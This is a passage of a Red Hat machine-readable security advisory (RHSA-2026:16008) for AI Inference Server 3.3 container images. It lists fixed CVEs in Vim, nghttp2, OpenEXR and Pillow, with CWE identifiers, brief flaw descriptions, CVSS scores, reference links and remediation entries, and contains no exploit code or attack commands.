"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "RHBZ#2437843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25749",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25749"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9",
"url": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.1.2132",
"url": "https://github.com/vim/vim/releases/tag/v9.1.2132"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43",
"url": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43"
}
],
"release_date": "2026-02-06T22:43:38.630000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing"
},
{
"cve": "CVE-2026-27135",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2026-03-18T19:02:13.823002+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448754"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "RHBZ#2448754",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1",
"url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6",
"url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6"
}
],
"release_date": "2026-03-18T17:59:02.045000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination"
},
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
},
{
"cve": "CVE-2026-28417",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-02-27T22:01:53.728412+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "RHBZ#2443455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28417",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28417"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860",
"url": "https://github.com/vim/vim/commit/79348dbbc09332130f4c860"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0073",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0073"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336",
"url": "https://github.com/vim/vim/security/advisories/GHSA-m3xh-9434-g336"
}
],
"release_date": "2026-02-27T21:54:35.196000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin"
},
{
"cve": "CVE-2026-28421",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-27T23:01:44.673504+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443474"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Denial of service and information disclosure via crafted swap file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The risk posed by this vulnerability is limited on Red Hat products due to user and system isolation features which are enabled by default. The impacts of this flaw will be limited by the active user\u0027s permissions and access control limits. Host systems are not at risk when following Red Hat guidelines and the root user account is not actively executing Vim.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "RHBZ#2443474",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443474"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28421",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28421"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/65c1a143c331c886dc28",
"url": "https://github.com/vim/vim/commit/65c1a143c331c886dc28"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0077",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0077"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p",
"url": "https://github.com/vim/vim/security/advisories/GHSA-r2gw-2x48-jj5p"
}
],
"release_date": "2026-02-27T22:06:34.312000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Denial of service and information disclosure via crafted swap file"
},
{
"cve": "CVE-2026-33412",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-03-24T20:02:21.511965+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450907"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim. By including a newline character in a pattern passed to Vim\u0027s glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user\u0027s shell settings.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via command injection in glob() function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "RHBZ#2450907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450907"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33412",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33412"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a",
"url": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0202",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0202"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c",
"url": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c"
}
],
"release_date": "2026-03-24T19:43:07.219000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vim: Vim: Arbitrary code execution via command injection in glob() function"
},
{
"cve": "CVE-2026-40192",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-04-16T00:00:49.590876+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2458856"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library\u0027s failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "RHBZ#2458856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458856"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628",
"url": "https://github.com/python-pillow/Pillow/commit/3cb854e8b2bab43f40e342e665f9340d861aa628"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9521",
"url": "https://github.com/python-pillow/Pillow/pull/9521"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-whj4-6x5x-4v2j"
},
{
"category": "external",
"summary": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb",
"url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.2.0.html#prevent-fits-decompression-bomb"
}
],
"release_date": "2026-04-15T22:53:56.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
